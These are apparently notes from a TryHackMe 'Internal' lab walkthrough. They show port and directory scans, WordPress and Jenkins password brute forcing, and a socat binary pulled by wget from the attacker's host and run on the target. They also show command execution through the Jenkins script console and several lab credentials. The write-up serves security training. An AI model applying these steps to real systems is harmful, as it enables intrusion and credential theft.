Skip to content

THM - Internal

Summary

Config

sudo vim /etc/hosts*

10.10.102.246   internal.thm

System info

  • Apache/2.4.29 (Ubuntu)
  • Linux version 4.15.0-112-generic
  • Distributor ID: Ubuntu
  • Description: Ubuntu 18.04.4 LTS
  • Release: 18.04
  • Codename: bionic

System User - a

USER: aubreanna PASSWORD: bubbxxxxxxx123

System User - root

USER: root PASSWORD: tr0xxxxxx123

WordPress

  • VERSION: 5.4.2
  • USER: admin
  • PASSWORD: my2boys

Phpmyadmin

  • VERSION: 4.6.6deb5
  • URL: http://internal.thm/phpmyadmin/index.php
  • USER: wordpress
  • PASS: wordpress123

Jenkins

USER: admin PASSWORD: sxxxxxx

Configuration

cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 internal

nmap

nmap -sC -sV -p- internal.thm
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster dir

gobuster dir --url http://internal.thm/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url http://internal.thm/blog/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
gobuster dir --url http://internal.thm/phpmyadmin/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
  • http://internal.thm/ (Apache2 Ubuntu Default Page)
    • http://internal.thm/blog/ (WordPress)
      • http://internal.thm/blog/wp-admin
      • http://internal.thm/blog/wp-content
      • http://internal.thm/blog/wp-includes
      • http://internal.thm/blog/index.php/wp-json/wp/v2/users
        • http://internal.thm/blog/index.php/wp-json/wp/v2/users/1
    • http://internal.thm/javascript/ - 403
      • http://internal.thm/javascript/prototype/ -403
      • http://internal.thm/javascript/scriptaculous/ - 403
      • http://internal.thm/javascript/jquery/ - 403
    • http://internal.thm/phpmyadmin/ - (phpmyadmin) (4.6.6deb5)
      • http://internal.thm/phpmyadmin/templates - 403
      • http://internal.thm/phpmyadmin/themes/ - 403
      • http://internal.thm/phpmyadmin/libraries/ - 403
      • http://internal.thm/phpmyadmin/setup/ - 401
      • http://internal.thm/phpmyadmin/sql/ - 403
      • http://internal.thm/phpmyadmin/js/ - 403
      • http://internal.thm/phpmyadmin/locale/ - 403
    • http://internal.thm/server-status/ 403

gobuster vhost

gobuster vhost -u http://internal.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
  • gc._msdcs.internal.thm
  • _domainkey.internal.thm
  • mailing._domainkey.sunnynews.internal.thm
  • mailing._domainkey.info.internal.thm
  • hallam_dev.internal.thm
  • hallam_ad.internal.thm
  • wm_j_b__ruffin.internal.thm
  • 2609_n_www.internal.thm
  • 0907_n_hn.m.internal.thm
  • 0507_n_hn.internal.thm
  • faitspare_mbp.cit.internal.thm
  • sb_0601388345bc6cd8.internal.thm
  • sb_0601388345bc450b.internal.thm
  • api_portal_dev.internal.thm
  • api_web_dev.internal.thm
  • api_webi_dev.internal.thm
  • sklep_test.internal.thm

feroxbuster

feroxbuster --url http://internal.thm -s 200 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

200 GET 375l 964w 10918c http://internal.thm/ 200 GET 328l 3640w 0c http://internal.thm/blog/ 200 GET 0l 0w 0c http://internal.thm/blog/wp-content/ 200 GET 0l 0w 0c http://internal.thm/blog/wp-content/plugins/ 200 GET 26l 359w 0c http://internal.thm/phpmyadmin/

  • http://internal.thm
  • http://internal.thm/
  • http://internal.thm/icons/
  • http://internal.thm/blog/
  • http://internal.thm/icons/small/
  • http://internal.thm/javascript/
  • http://internal.thm/blog/wp-content/
  • http://internal.thm/blog/wp-includes/
  • http://internal.thm/blog/wp-includes/images/
  • http://internal.thm/blog/wp-includes/assets/
  • http://internal.thm/blog/wp-includes/css/
  • http://internal.thm/blog/wp-includes/js/
  • http://internal.thm/blog/wp-includes/blocks/
  • http://internal.thm/blog/wp-includes/widgets/
  • http://internal.thm/blog/wp-content/plugins/
  • http://internal.thm/blog/wp-includes/fonts/
  • http://internal.thm/blog/wp-includes/customize/
  • http://internal.thm/phpmyadmin/
  • http://internal.thm/phpmyadmin/sql/

wpscan

Scan for password

wpscan --url http://internal.thm/blog --passwords /usr/share/wordlists/rockyou.txt --proxy http://localhost:8080
  • Username: admin
  • Password: xxxxxx

Scan for info

wpscan --url http://internal.thm/blog --api-token=.....
  • [+] Headers Server: Apache/2.4.29 (Ubuntu)
  • [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
  • [+] WordPress readme found: http://internal.thm/blog/readme.html
  • [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
  • [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
  • [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
  • [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
  • [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
  • [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
  • [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
  • [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
  • [!] Title: WordPress < 5.8 - Plugin Confusion
  • [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
  • [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
  • [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
  • [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
  • [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
  • [+] WordPress theme in use: twentyseventeen

.linpeas.sh scan as www-data user

www-data@internal:/tmp$ ./linpeas.sh

Basic information

  • OS: Linux version 4.15.0-112-generic
  • User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • Hostname: internal
  • Writable folder: /dev/shm
  • Distributor ID: Ubuntu
  • Description: Ubuntu 18.04.4 LTS
  • Release: 18.04
  • Codename: bionic
  • Sudo version 1.8.21p2
  • /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  • New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  • /usr/bin/docker
  • /usr/bin/lxc
  • /usr/sbin/runc

Processes, Crons, Timers, Services and Sockets

... ==aubrean+ 1452 0.0 0.0 1148 4 ? Ss 12:15 0:00 _ /sbin/tini -- /usr/local/bin/jenkins.sh== ==aubrean+ 1494 0.4 12.3 2587808 251972 ? Sl 12:15 0:24 _ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war== root 1419 0.0 0.1 404800 3464 ? Sl 12:15 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080 ...

Hostname, hosts and DNS

internal 127.0.0.1 localhost 127.0.1.1 internal

Active Ports

(netstat -punta || ss --ntpu)

tcp 0 0     127.0.0.1:8080          0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.1:39091         0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.53:53            0.0.0.0:* LISTEN -
tcp 0 0     0.0.0.0:22                  0.0.0.0:* LISTEN -
tcp 0 0     127.0.0.1:3306          0.0.0.0:* LISTEN -
tcp6 0 0    :::80                           :::* LISTEN -
tcp6 0 0    :::22                           :::* LISTEN -

Users Information

uid=33(www-data) gid=33(www-data) groups=33(www-data)

All users & groups

uid=0(root) gid=0(root) groups=0(root) uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev) uid=111(mysql) gid=114(mysql) groups=114(mysql) uid=33(www-data) gid=33(www-data) groups=33(www-data)

Useful software

  • /usr/bin/base64
  • /usr/bin/ctr
  • /usr/bin/curl
  • /usr/bin/docker
  • /usr/bin/lxc
  • /bin/nc
  • /bin/netcat
  • /usr/bin/perl
  • /usr/bin/php
  • /bin/ping
  • /usr/bin/python
  • /usr/bin/python2
  • /usr/bin/python2.7
  • /usr/bin/python3
  • /usr/bin/python3.6
  • /usr/sbin/runc
  • /usr/bin/sudo
  • /usr/bin/wget

Installed Compilers

  • /snap/core/8268/usr/share/gcc-5
  • /snap/core/9665/usr/share/gcc-5
  • /usr/share/gcc-8

Analyzing Wordpress Files (limit 70)

  • -rw-r--r-- 1 root root 3109 Aug 3 2020 /var/www/html/wordpress/wp-config.php
  • define( 'DB_NAME', 'wordpress' );
  • define( 'DB_USER', 'wordpress' );
  • define( 'DB_PASSWORD', 'wordxxxxxx' );
  • define( 'DB_HOST', 'localhost' );

hosts.allow

/etc/hosts.allow

Message in txt file

cat /opt/wp-save.txt 
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb1xxxxxx

access to internal resources

Dump configuration

netstat -tulpn | grep LISTEN

tcp 0 0 127.0.0.1:3306 0.0.0.0: LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:
LISTEN -
tcp 0 0 127.0.0.1:45619 0.0.0.0: LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:
LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0: LISTEN -
tcp6 0 0 :::80 :::
LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

Use socat to port forwarding

Template

socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &

Source of socat binary (hacker machine)

git clone https://github.com/andrew-d/static-binaries
cd static-binaries/binaries/linux/x86_64
python3 -m http.server

Get socat and run (target machine)

wget 10.18.9.175:8000/socat
chmod +x socat
./socat TCP-LISTEN:8081,fork TCP:0.0.0.0:8080 &

New target jenkins

URL

http://internal.thm:8081/

Scan for version

use auxiliary/scanner/http/jenkins_enum
setg RHOSTS internal.thm
setg RPORT 8081
setg TARGETURI /
show options
run

[+] 10.10.140.111:8081 - Jenkins Version 2.250

Scan for password

use auxiliary/scanner/http/jenkins_login
setg RHOSTS internal.thm
setg RPORT 8081
setg PASS_FILE /usr/share/wordlists/rockyou.txt
setg USERNAME admin
setg STOP_ON_SUCCESS true
show options

[+] 10.10.158.66:8081 - Login Successful: admin:spongebob

Use jenkins script

  • http://internal.thm:8081/script
println 'whoami'.execute().text
println 'ls -la /'.execute().text
println 'ls -la /home'.execute().text
println 'ls -la /root'.execute().text
println 'ls -la /opt'.execute().text
println 'cat /opt/note.txt'.execute().text

root:tr0ub1xxxxx